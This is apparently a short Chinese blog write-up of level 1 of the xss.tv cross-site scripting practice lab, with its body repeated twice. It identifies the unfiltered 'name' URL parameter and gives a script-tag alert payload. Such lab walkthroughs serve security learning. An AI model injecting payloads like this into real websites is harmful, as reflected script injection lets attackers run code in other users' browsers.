XSS level--1
2017-06-20 本文已影响0人
Alisita
Author:Alisita
观察URL,
http://test.xss.tv/level1.php?name=test
输入点就在URL里面,参数是name
输出点在页面
这一关没有任何过滤,很简单
所以构造payload
<script>alert('xxs')</script>
观察URL,
http://test.xss.tv/level1.php?name=test
输入点就在URL里面,参数是name
输出点在页面
这一关没有任何过滤,很简单
所以构造payload
<script>alert('xxs')</script>